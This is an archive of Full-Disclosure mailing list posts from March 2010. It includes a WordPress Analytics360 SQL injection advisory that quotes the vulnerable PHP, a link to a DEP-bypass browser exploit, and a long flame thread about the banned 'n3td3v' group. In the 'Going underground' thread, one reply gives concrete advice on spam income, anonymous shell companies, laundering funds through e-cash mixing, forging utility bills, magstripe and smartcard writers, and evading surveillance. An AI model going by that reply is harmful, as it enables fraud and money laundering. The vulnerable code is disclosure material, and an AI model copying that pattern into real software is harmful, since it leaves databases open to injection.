> Let's just say we haven't been able to release any information to
> the public for over a year now.
> 
> We don't have anywhere we can post information.

You can post to Bugtraq, your own blog, pass it to people you know on F-D that
might pass along any *actual* new info you have, send it to the US CERT (who
are perfectly willing to take reports from outside the borders), etc etc etc.
I know even if I was banned from F-D and every other list I was on, I could
easily scare up 3 or 4 dozen people I could mail privately and at least one
of them would pass the info along to those who need to know.

> Isn't it a security risk to ban one the biggest security &
> intelligence groups in the UK from posting?

Now, is that merely "biggest", or is there anybody with actual security clout?
L0pht was never big, but they had clue and clout.  50,000 wannabies may be
biggest, but not have clout.

> A security & intelligence group with over 6000 security
> professionals in jobs around the world who make up the n3td3v
> group, banned from making announcements relating to national
> security matters.

And if you're an intelligence group with 6,000 professionals, *somebody* should
have a list of likely contacts. In fact, that's something that should make
you think for a moment - if there's 6,000 people, and *one* of them is banned
from this *one* list, who are these *other* 5,999 professionals who are so
incompetent that they can't get the word out for you? Please let us know, so
we can avoid hiring them.  

Seriously guys - 6,000 *professionals* and *not one* of you can find your ass
with both hands, a flashlight, and a map?

It's been a long time since I laughed so hard I almost wet myself. Thanks
for the Monday humor. ;)


pgpjWaMQbmede.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wordpress plugin 'Analytics360'- authenticated user sql injection

[Jan G.B.]

OK, well - before I get 1 replies: the question was a rhetoric one.


2010/3/1 Benji 

> http://crowdfavorite.com/ loads fine here.
>
> On Mon, Mar 1, 2010 at 4:03 PM, Jan G.B. wrote:
>
>> Hi there,
>>
>> I just noticed that authenticated users for the admin area of a wordpress
>> blog may inject code into database queries, when the plugin "Analytics360"
>> is activated.
>>
>> ### BASIC INFORMATION ###
>>
>> Plugin Name: Analytics360
>> Plugin URI:
>> http://www.mailchimp.com/wordpress_analytics_plugin/?pid=wordpress&source=website
>> Author: Crowd Favorite
>> Author URI: http://crowdfavorite.com
>>
>>
>> ### Affected Version ###
>>
>> Analytics360 v.1.2
>> (and earlier Versions, I guess…)
>>
>>
>> ### Risk ###
>>
>> Well, I can't classify this. When you're not insane, you shouldn't have
>> people as admins, who inject code into the database queries.
>> But, when you have such admins, or your WP-Login is collected by phishing
>> or something alike, your db server and data may be at risk.
>> It all depends on your setup and permissions. However, the bug is easy to
>> fix and so it should be fixed.
>>
>> http://codex.wordpress.org/Function_Reference/wpdb_Class#Run_Any_Query_on_the_Database
>>
>>
>> ### DETAILS ###
>>
>> The code contains this evil part in analytics360.php:
>> 
>>   case 'get_wp_posts':
>>   add_filter('posts_where', create_function(
>>   '$where',
>>   'return $where." AND post_date >=
>> \''.$_GET['start_date'].'\' AND post_date < \''.$_GET['end_date'].'\'";'
>>   ));
>> 
>>
>>
>> ### Disclosure Timeline ###
>>
>> You're the first to know.
>> Anyone is able to telnet crowdfavorite.com:80 ? As I'm writing this, the
>> site is unresponsive.
>> So this is what happens when you include a website as contact information:
>> you don't get the message.
>>
>>
>> Regards
>>
>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Going "underground", living out of backpack, etc?

[T Biehn]

Simon: What you need is a constant source of income. I suggest you
study TAO Spam (more than just inboxing, mind you.)
You will need an anonymous corporation for fund intake. You will want
a business bank account. You will want to transfer the funds that come
into your account into electronic cash. You will want to mix this cash
about. You will want to lose and create these companies often.

Expect to take a 35% (conservative figure) hit on all profit for
exchange services.

Be sure to know your way around high quality printing and photoshop.
Have a large database of Water & Electric bills. Invest in a
lamination machine. Invest in a magstrip writer & logger, invest in a
smartcard season logger/reader/writer. Learn how to solder. Learn how
to do fast-low cost fabrication.

Acquaint yourself with prepaid visa gift cards and e-cash debit cards.
Acquaint yourself with online (re-)mailing services.
Dispose of all digital equipment you already own and buy new kit with
prepaid visa gift cards or cash.  Perform activations at wifi spots,
don't make the mistake of being in the view of security cameras.
Remove their batteries. Relocate and disappear.

Do not contact friends and family. If you operate online do not use a
constant pseudonym.

-Travis

On Mon, Mar 1, 2010 at 2:21 AM, Christian Sciberras  wrote:
> Start by not touching any kind of digital device. You wouldn't know how many
> chinese have put tracking/spy bugs inside them. Or how many modified NSA
> backdoors, for the matter.
> Using a PC probably increases risk by 1000%.
>
>
>
>
> On Mon, Mar 1, 2010 at 5:49 AM, Simon Garfinkle  wrote:
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Hello.
>>
>> I am interested in getting some advice from you security
>> professionals (white hat and black hat) about going underground.
>>
>> I am sick of big brother, I love independence, I was to experience
>> the world and have no commitments.
>>
>> I am just sick of being held down in one place. It's too easy for
>> people to harass and stalk you.  You gotta be mobile. Fancy free
>> and foot loose.
>>
>> You gotta be underground.
>>
>> Have any advice for living out of a bag? Any stories? Any lessons?
>>
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQMCAAYFAkuLR3UACgkQRQnwIcxK0rKdJwP9Fbv4ENsN+ouzbn34owsypykpL00+
>> E1qCZBwZGD4EJ5QK6PKdyR3kc33hOOasqaWn+HQVX1OtdKa/bXwWCJw3b3bEbImPHHoM
>> FSfO7mJsrifYsufZcXtgRgFOI3KA7W+cN1DHncawcBf5/7CNKrjXSVi2NewLsp7beFlM
>> gJrMvYw=
>> =ii33
>> -END PGP SIGNATURE-
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wordpress plugin 'Analytics360'- authenticated user sql injection

[Benji]

http://crowdfavorite.com/ loads fine here.

On Mon, Mar 1, 2010 at 4:03 PM, Jan G.B.  wrote:

> Hi there,
>
> I just noticed that authenticated users for the admin area of a wordpress
> blog may inject code into database queries, when the plugin "Analytics360"
> is activated.
>
> ### BASIC INFORMATION ###
>
> Plugin Name: Analytics360
> Plugin URI:
> http://www.mailchimp.com/wordpress_analytics_plugin/?pid=wordpress&source=website
> Author: Crowd Favorite
> Author URI: http://crowdfavorite.com
>
>
> ### Affected Version ###
>
> Analytics360 v.1.2
> (and earlier Versions, I guess…)
>
>
> ### Risk ###
>
> Well, I can't classify this. When you're not insane, you shouldn't have
> people as admins, who inject code into the database queries.
> But, when you have such admins, or your WP-Login is collected by phishing
> or something alike, your db server and data may be at risk.
> It all depends on your setup and permissions. However, the bug is easy to
> fix and so it should be fixed.
>
> http://codex.wordpress.org/Function_Reference/wpdb_Class#Run_Any_Query_on_the_Database
>
>
> ### DETAILS ###
>
> The code contains this evil part in analytics360.php:
> 
>   case 'get_wp_posts':
>   add_filter('posts_where', create_function(
>   '$where',
>   'return $where." AND post_date >=
> \''.$_GET['start_date'].'\' AND post_date < \''.$_GET['end_date'].'\'";'
>   ));
> 
>
>
> ### Disclosure Timeline ###
>
> You're the first to know.
> Anyone is able to telnet crowdfavorite.com:80 ? As I'm writing this, the
> site is unresponsive.
> So this is what happens when you include a website as contact information:
> you don't get the message.
>
>
> Regards
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Wordpress plugin 'Analytics360'- authenticated user sql injection

[Jan G.B.]

Hi there,

I just noticed that authenticated users for the admin area of a wordpress
blog may inject code into database queries, when the plugin "Analytics360"
is activated.

### BASIC INFORMATION ###

Plugin Name: Analytics360
Plugin URI:
http://www.mailchimp.com/wordpress_analytics_plugin/?pid=wordpress&source=website
Author: Crowd Favorite
Author URI: http://crowdfavorite.com


### Affected Version ###

Analytics360 v.1.2
(and earlier Versions, I guess…)


### Risk ###

Well, I can't classify this. When you're not insane, you shouldn't have
people as admins, who inject code into the database queries.
But, when you have such admins, or your WP-Login is collected by phishing or
something alike, your db server and data may be at risk.
It all depends on your setup and permissions. However, the bug is easy to
fix and so it should be fixed.

http://codex.wordpress.org/Function_Reference/wpdb_Class#Run_Any_Query_on_the_Database


### DETAILS ###

The code contains this evil part in analytics360.php:

  case 'get_wp_posts':
  add_filter('posts_where', create_function(
  '$where',
  'return $where." AND post_date >=
\''.$_GET['start_date'].'\' AND post_date < \''.$_GET['end_date'].'\'";'
  ));



### Disclosure Timeline ###

You're the first to know.
Anyone is able to telnet crowdfavorite.com:80 ? As I'm writing this, the
site is unresponsive.
So this is what happens when you include a website as contact information:
you don't get the message.


Regards
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Internet Exploiter 2 - bypassing DEP

[Berend-Jan Wever]

Hey all,

I released a version of my Internet Exploiter 2 exploit from 2005 that
bypasses DEP. If you are familiar with my Internet Exploiter series of
exploits and/or are interested in how to use heap-spraying to bypass DEP,
you may like this:
http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/

Cheers,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] full disclosure is an intelligence blackhole

[Elly_Tran_Ha]

Yahoo massager has 0days? No way!

On Mon, Mar 1, 2010 at 8:53 AM, intel unit  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> back off kid
>
> "n3td3v" is trying to save lives here
>
> yahoo messenger has 0days. now if gadi evron and the mossad were to
> get onto that, it wouldn't be a good thing, now would it?
>
> On Mon, 01 Mar 2010 08:53:53 + "McGhee, Eddie"
>  wrote:
> >Come on mate seriously its getting boring, if any serious security
> >threats are out there then drop the info and man up, stop with the
> >bullshit of making netdev a poor internet meme, because that's all
> >it is..
> >
> >-Original Message-
> >From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
> >disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
> >Sent: 01 March 2010 08:06
> >To: full-disclosure@lists.grok.org.uk
> >Subject: [Full-disclosure] full disclosure is an intelligence
> >blackhole
> >
> >-BEGIN PGP SIGNED MESSAGE-
> >Hash: SHA1
> >
> >John Cartwright is perpetrating global conflict by censoring
> >n3td3v's 0days and commenting.
> >Opinion by Andrew Wallace. Published by a believer in free speech
> >who knows Andrew Wallace is an super spy expert. Luyk a jelly
> >samwich amirite?
> >
> >
> >Is banning people from a mailing list a national security risk?
> >
> >We haven't been on the mailing list since January 2009, although
> >there have been plenty of hackers trying to impersonate us.
> >
> >For sure the impersonations are misleading, and we would like to
> >ask, is banning people from a mailing list a vulnerability?
> >
> >Let's just say we haven't been able to release any information to
> >the public for over a year now.
> >
> >We don't have anywhere we can post information.
> >
> >Isn't it a security risk to ban one the biggest security &
> >intelligence groups in the UK from posting?
> >
> >We think so, and why would you want to create a climate where
> >there are plenty n3td3v wanna be's posting to the mailing list,
> >but no actual intelligence on what we're upto, what we've been
> >researching or anything like that.
> >
> >A security & intelligence group with over 6000 security
> >professionals in jobs around the world who make up the n3td3v
> >group, banned from making announcements relating to national
> >security matters.
> >
> >A whole year of no information getting out to the security
> >industry about the vulnerabilities in national security and other
> >research that we've been getting upto.
> >
> >None of that has been post, its all been supressed.
> >
> >By who? One man decided to risk security by banning one of the
> >largest security groups in the United Kingdom.
> >
> >We were treated badly on the mailing list, it wasn't us in the
> >wrong, we only defended ourselves and the integrity of our group
> >from people who were obviously wanting an argument.
> >
> >We aren't playing around, we are grown adults who are serious
> >about security & intelligence.
> >
> >We were made out to be something that we weren't, its not nice to
> >be treated like that.
> >
> >It's why the mailing list can't be taken seriously and poses a
> >risk to national security.
> >
> >Because the people who do research security aren't able to post on
> >the mailing list.
> >
> >And I don't know why more people haven't spoken out about an
> >organisation as big as n3td3v being banned from the mailing list,
> >its a risk to national security.
> >
> >We don't post our intelligence anywhere else apart from the
> >mailing list we've been banned from, and we don't give out any
> >signals intelligence about what we are getting upto, we're very
> >careful about that.
> >
> >The only opportunity to find out what the n3td3v security and
> >intelligence group were upto was being subscribed to the mailing
> >list and reading our emails.
> >
> >Andrew is banned, and banned with that are the voices of over 6000
> >and more researchers, security consultants and many others.
> >
> >Is banning n3td3v from Full-disclosure mailing list a national
> >security issue? Of course it is.
> >
> >National security has been at risk for over a year and will remain
> >at risk... because the information flow has been cut off.
> >
> >Who will be to blame? One man who runs the mailing list, one man
> >will need to live with himself, his name is John Cartwright.
> >
> >He has cut off a major security research and intelligence group on
> >purpose, I don't think he cares about national security.
> >
> >Can he live with himself?
> >
> >We've been sitting in our offices wondering this for over a year,
> >we've held security conferences with our members and other stuff
> >and remain frustrated that we've been cut off from communicating
> >with the security industry.
> >
> >Yours faithfully,
> >
> >n3td3v security
> >& intelligence group
> >-BEGIN PGP SIGNATURE-
> >Charset: UTF8
> >Note: This signature can be verified at
> >https://www.hushtools.com/verify
> >Version: Hush 3.0
> >
> >wpwEAQMCAAYFAkuLdX8ACgkQwGo

Re: [Full-disclosure] full disclosure is an intelligence blackhole

[intel unit]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

back off kid

"n3td3v" is trying to save lives here

yahoo messenger has 0days. now if gadi evron and the mossad were to
get onto that, it wouldn't be a good thing, now would it?

On Mon, 01 Mar 2010 08:53:53 + "McGhee, Eddie"
 wrote:
>Come on mate seriously its getting boring, if any serious security
>threats are out there then drop the info and man up, stop with the
>bullshit of making netdev a poor internet meme, because that's all
>it is..
>
>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
>Sent: 01 March 2010 08:06
>To: full-disclosure@lists.grok.org.uk
>Subject: [Full-disclosure] full disclosure is an intelligence
>blackhole
>
>-BEGIN PGP SIGNED MESSAGE-
>Hash: SHA1
>
>John Cartwright is perpetrating global conflict by censoring
>n3td3v's 0days and commenting.
>Opinion by Andrew Wallace. Published by a believer in free speech
>who knows Andrew Wallace is an super spy expert. Luyk a jelly
>samwich amirite?
>
>
>Is banning people from a mailing list a national security risk?
>
>We haven't been on the mailing list since January 2009, although
>there have been plenty of hackers trying to impersonate us.
>
>For sure the impersonations are misleading, and we would like to
>ask, is banning people from a mailing list a vulnerability?
>
>Let's just say we haven't been able to release any information to
>the public for over a year now.
>
>We don't have anywhere we can post information.
>
>Isn't it a security risk to ban one the biggest security &
>intelligence groups in the UK from posting?
>
>We think so, and why would you want to create a climate where
>there are plenty n3td3v wanna be's posting to the mailing list,
>but no actual intelligence on what we're upto, what we've been
>researching or anything like that.
>
>A security & intelligence group with over 6000 security
>professionals in jobs around the world who make up the n3td3v
>group, banned from making announcements relating to national
>security matters.
>
>A whole year of no information getting out to the security
>industry about the vulnerabilities in national security and other
>research that we've been getting upto.
>
>None of that has been post, its all been supressed.
>
>By who? One man decided to risk security by banning one of the
>largest security groups in the United Kingdom.
>
>We were treated badly on the mailing list, it wasn't us in the
>wrong, we only defended ourselves and the integrity of our group
>from people who were obviously wanting an argument.
>
>We aren't playing around, we are grown adults who are serious
>about security & intelligence.
>
>We were made out to be something that we weren't, its not nice to
>be treated like that.
>
>It's why the mailing list can't be taken seriously and poses a
>risk to national security.
>
>Because the people who do research security aren't able to post on
>the mailing list.
>
>And I don't know why more people haven't spoken out about an
>organisation as big as n3td3v being banned from the mailing list,
>its a risk to national security.
>
>We don't post our intelligence anywhere else apart from the
>mailing list we've been banned from, and we don't give out any
>signals intelligence about what we are getting upto, we're very
>careful about that.
>
>The only opportunity to find out what the n3td3v security and
>intelligence group were upto was being subscribed to the mailing
>list and reading our emails.
>
>Andrew is banned, and banned with that are the voices of over 6000
>and more researchers, security consultants and many others.
>
>Is banning n3td3v from Full-disclosure mailing list a national
>security issue? Of course it is.
>
>National security has been at risk for over a year and will remain
>at risk... because the information flow has been cut off.
>
>Who will be to blame? One man who runs the mailing list, one man
>will need to live with himself, his name is John Cartwright.
>
>He has cut off a major security research and intelligence group on
>purpose, I don't think he cares about national security.
>
>Can he live with himself?
>
>We've been sitting in our offices wondering this for over a year,
>we've held security conferences with our members and other stuff
>and remain frustrated that we've been cut off from communicating
>with the security industry.
>
>Yours faithfully,
>
>n3td3v security
>& intelligence group
>-BEGIN PGP SIGNATURE-
>Charset: UTF8
>Note: This signature can be verified at
>https://www.hushtools.com/verify
>Version: Hush 3.0
>
>wpwEAQMCAAYFAkuLdX8ACgkQwGoky+I7EouDgAP5AUjZ2+mKCx4dduWJlNWgAN8Iwnk
>L
>PqokbvRhGDeHoWCBWeTjqoYxh49Z2fzA4EIcrtmL7miGfXicLHWJyBoSriMUFL97IYe
>3
>hAziWzbIanVTbqftrz1ayRVx0k3vdu/5Hwocda6lCmgivdLjWhrL0UaKby3LQbc1nBq
>B
>mCK69YQ=
>=xM2C
>-END PGP SIGNATURE-
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.gr

[Full-disclosure] United States Department of Defense Embraces Hacker Certification to Protect US Interests

[yersinia]

Perhaps this news could be of interest to someone on this lists.

http://www.free-press-release.com/news-united-states-department-of-defense-embraces-hacker-certification-to-protect-us-interests-1267435223.html

Regards
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] full disclosure is an intelligence blackhole

[Christian Sciberras]

Boring?
Amusing more likely.

On Mon, Mar 1, 2010 at 9:53 AM, McGhee, Eddie  wrote:

> Come on mate seriously its getting boring, if any serious security threats
> are out there then drop the info and man up, stop with the bullshit of
> making netdev a poor internet meme, because that's all it is..
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
> Sent: 01 March 2010 08:06
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] full disclosure is an intelligence blackhole
>
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> John Cartwright is perpetrating global conflict by censoring n3td3v's 0days
> and commenting.
> Opinion by Andrew Wallace. Published by a believer in free speech who knows
> Andrew Wallace is an super spy expert. Luyk a jelly samwich amirite?
>
>
> Is banning people from a mailing list a national security risk?
>
> We haven't been on the mailing list since January 2009, although there have
> been plenty of hackers trying to impersonate us.
>
> For sure the impersonations are misleading, and we would like to ask, is
> banning people from a mailing list a vulnerability?
>
> Let's just say we haven't been able to release any information to the
> public for over a year now.
>
> We don't have anywhere we can post information.
>
> Isn't it a security risk to ban one the biggest security & intelligence
> groups in the UK from posting?
>
> We think so, and why would you want to create a climate where there are
> plenty n3td3v wanna be's posting to the mailing list, but no actual
> intelligence on what we're upto, what we've been researching or anything
> like that.
>
> A security & intelligence group with over 6000 security professionals in
> jobs around the world who make up the n3td3v group, banned from making
> announcements relating to national security matters.
>
> A whole year of no information getting out to the security industry about
> the vulnerabilities in national security and other research that we've been
> getting upto.
>
> None of that has been post, its all been supressed.
>
> By who? One man decided to risk security by banning one of the largest
> security groups in the United Kingdom.
>
> We were treated badly on the mailing list, it wasn't us in the wrong, we
> only defended ourselves and the integrity of our group from people who were
> obviously wanting an argument.
>
> We aren't playing around, we are grown adults who are serious about
> security & intelligence.
>
> We were made out to be something that we weren't, its not nice to be
> treated like that.
>
> It's why the mailing list can't be taken seriously and poses a risk to
> national security.
>
> Because the people who do research security aren't able to post on the
> mailing list.
>
> And I don't know why more people haven't spoken out about an organisation
> as big as n3td3v being banned from the mailing list, its a risk to national
> security.
>
> We don't post our intelligence anywhere else apart from the mailing list
> we've been banned from, and we don't give out any signals intelligence about
> what we are getting upto, we're very careful about that.
>
> The only opportunity to find out what the n3td3v security and intelligence
> group were upto was being subscribed to the mailing list and reading our
> emails.
>
> Andrew is banned, and banned with that are the voices of over 6000 and more
> researchers, security consultants and many others.
>
> Is banning n3td3v from Full-disclosure mailing list a national security
> issue? Of course it is.
>
> National security has been at risk for over a year and will remain at
> risk... because the information flow has been cut off.
>
> Who will be to blame? One man who runs the mailing list, one man will need
> to live with himself, his name is John Cartwright.
>
> He has cut off a major security research and intelligence group on purpose,
> I don't think he cares about national security.
>
> Can he live with himself?
>
> We've been sitting in our offices wondering this for over a year, we've
> held security conferences with our members and other stuff and remain
> frustrated that we've been cut off from communicating with the security
> industry.
>
> Yours faithfully,
>
> n3td3v security
> & intelligence group
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQMCAAYFAkuLdX8ACgkQwGoky+I7EouDgAP5AUjZ2+mKCx4dduWJlNWgAN8IwnkL
> PqokbvRhGDeHoWCBWeTjqoYxh49Z2fzA4EIcrtmL7miGfXicLHWJyBoSriMUFL97IYe3
> hAziWzbIanVTbqftrz1ayRVx0k3vdu/5Hwocda6lCmgivdLjWhrL0UaKby3LQbc1nBqB
> mCK69YQ=
> =xM2C
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> _

Re: [Full-disclosure] full disclosure is an intelligence blackhole

[McGhee, Eddie]

Come on mate seriously its getting boring, if any serious security threats are 
out there then drop the info and man up, stop with the bullshit of making 
netdev a poor internet meme, because that's all it is.. 

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
Sent: 01 March 2010 08:06
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] full disclosure is an intelligence blackhole

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

John Cartwright is perpetrating global conflict by censoring n3td3v's 0days and 
commenting.
Opinion by Andrew Wallace. Published by a believer in free speech who knows 
Andrew Wallace is an super spy expert. Luyk a jelly samwich amirite?


Is banning people from a mailing list a national security risk?

We haven't been on the mailing list since January 2009, although there have 
been plenty of hackers trying to impersonate us.

For sure the impersonations are misleading, and we would like to ask, is 
banning people from a mailing list a vulnerability?

Let's just say we haven't been able to release any information to the public 
for over a year now.

We don't have anywhere we can post information.

Isn't it a security risk to ban one the biggest security & intelligence groups 
in the UK from posting?

We think so, and why would you want to create a climate where there are plenty 
n3td3v wanna be's posting to the mailing list, but no actual intelligence on 
what we're upto, what we've been researching or anything like that.

A security & intelligence group with over 6000 security professionals in jobs 
around the world who make up the n3td3v group, banned from making announcements 
relating to national security matters.

A whole year of no information getting out to the security industry about the 
vulnerabilities in national security and other research that we've been getting 
upto.

None of that has been post, its all been supressed.

By who? One man decided to risk security by banning one of the largest security 
groups in the United Kingdom.

We were treated badly on the mailing list, it wasn't us in the wrong, we only 
defended ourselves and the integrity of our group from people who were 
obviously wanting an argument.

We aren't playing around, we are grown adults who are serious about security & 
intelligence.

We were made out to be something that we weren't, its not nice to be treated 
like that.

It's why the mailing list can't be taken seriously and poses a risk to national 
security.

Because the people who do research security aren't able to post on the mailing 
list.

And I don't know why more people haven't spoken out about an organisation as 
big as n3td3v being banned from the mailing list, its a risk to national 
security.

We don't post our intelligence anywhere else apart from the mailing list we've 
been banned from, and we don't give out any signals intelligence about what we 
are getting upto, we're very careful about that.

The only opportunity to find out what the n3td3v security and intelligence 
group were upto was being subscribed to the mailing list and reading our emails.

Andrew is banned, and banned with that are the voices of over 6000 and more 
researchers, security consultants and many others.

Is banning n3td3v from Full-disclosure mailing list a national security issue? 
Of course it is.

National security has been at risk for over a year and will remain at risk... 
because the information flow has been cut off.

Who will be to blame? One man who runs the mailing list, one man will need to 
live with himself, his name is John Cartwright.

He has cut off a major security research and intelligence group on purpose, I 
don't think he cares about national security.

Can he live with himself?

We've been sitting in our offices wondering this for over a year, we've held 
security conferences with our members and other stuff and remain frustrated 
that we've been cut off from communicating with the security industry.

Yours faithfully,

n3td3v security
& intelligence group
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkuLdX8ACgkQwGoky+I7EouDgAP5AUjZ2+mKCx4dduWJlNWgAN8IwnkL
PqokbvRhGDeHoWCBWeTjqoYxh49Z2fzA4EIcrtmL7miGfXicLHWJyBoSriMUFL97IYe3
hAziWzbIanVTbqftrz1ayRVx0k3vdu/5Hwocda6lCmgivdLjWhrL0UaKby3LQbc1nBqB
mCK69YQ=
=xM2C
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] full disclosure is an intelligence blackhole

[intel unit]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

John Cartwright is perpetrating global conflict by censoring
n3td3v's 0days and commenting.
Opinion by Andrew Wallace. Published by a believer in free speech
who knows Andrew Wallace is an super spy expert. Luyk a jelly
samwich amirite?


Is banning people from a mailing list a national security risk?

We haven't been on the mailing list since January 2009, although
there have been plenty of hackers trying to impersonate us.

For sure the impersonations are misleading, and we would like to
ask, is banning people from a mailing list a vulnerability?

Let's just say we haven't been able to release any information to
the public for over a year now.

We don't have anywhere we can post information.

Isn't it a security risk to ban one the biggest security &
intelligence groups in the UK from posting?

We think so, and why would you want to create a climate where there
are plenty n3td3v wanna be's posting to the mailing list, but no
actual intelligence on what we're upto, what we've been researching
or anything like that.

A security & intelligence group with over 6000 security
professionals in jobs around the world who make up the n3td3v
group, banned from making announcements relating to national
security matters.

A whole year of no information getting out to the security industry
about the vulnerabilities in national security and other research
that we've been getting upto.

None of that has been post, its all been supressed.

By who? One man decided to risk security by banning one of the
largest security groups in the United Kingdom.

We were treated badly on the mailing list, it wasn't us in the
wrong, we only defended ourselves and the integrity of our group
from people who were obviously wanting an argument.

We aren't playing around, we are grown adults who are serious about
security & intelligence.

We were made out to be something that we weren't, its not nice to
be treated like that.

It's why the mailing list can't be taken seriously and poses a risk
to national security.

Because the people who do research security aren't able to post on
the mailing list.

And I don't know why more people haven't spoken out about an
organisation as big as n3td3v being banned from the mailing list,
its a risk to national security.

We don't post our intelligence anywhere else apart from the mailing
list we've been banned from, and we don't give out any signals
intelligence about what we are getting upto, we're very careful
about that.

The only opportunity to find out what the n3td3v security and
intelligence group were upto was being subscribed to the mailing
list and reading our emails.

Andrew is banned, and banned with that are the voices of over 6000
and more researchers, security consultants and many others.

Is banning n3td3v from Full-disclosure mailing list a national
security issue? Of course it is.

National security has been at risk for over a year and will remain
at risk... because the information flow has been cut off.

Who will be to blame? One man who runs the mailing list, one man
will need to live with himself, his name is John Cartwright.

He has cut off a major security research and intelligence group on
purpose, I don't think he cares about national security.

Can he live with himself?

We've been sitting in our offices wondering this for over a year,
we've held security conferences with our members and other stuff
and remain frustrated that we've been cut off from communicating
with the security industry.

Yours faithfully,

n3td3v security
& intelligence group
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkuLdX8ACgkQwGoky+I7EouDgAP5AUjZ2+mKCx4dduWJlNWgAN8IwnkL
PqokbvRhGDeHoWCBWeTjqoYxh49Z2fzA4EIcrtmL7miGfXicLHWJyBoSriMUFL97IYe3
hAziWzbIanVTbqftrz1ayRVx0k3vdu/5Hwocda6lCmgivdLjWhrL0UaKby3LQbc1nBqB
mCK69YQ=
=xM2C
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/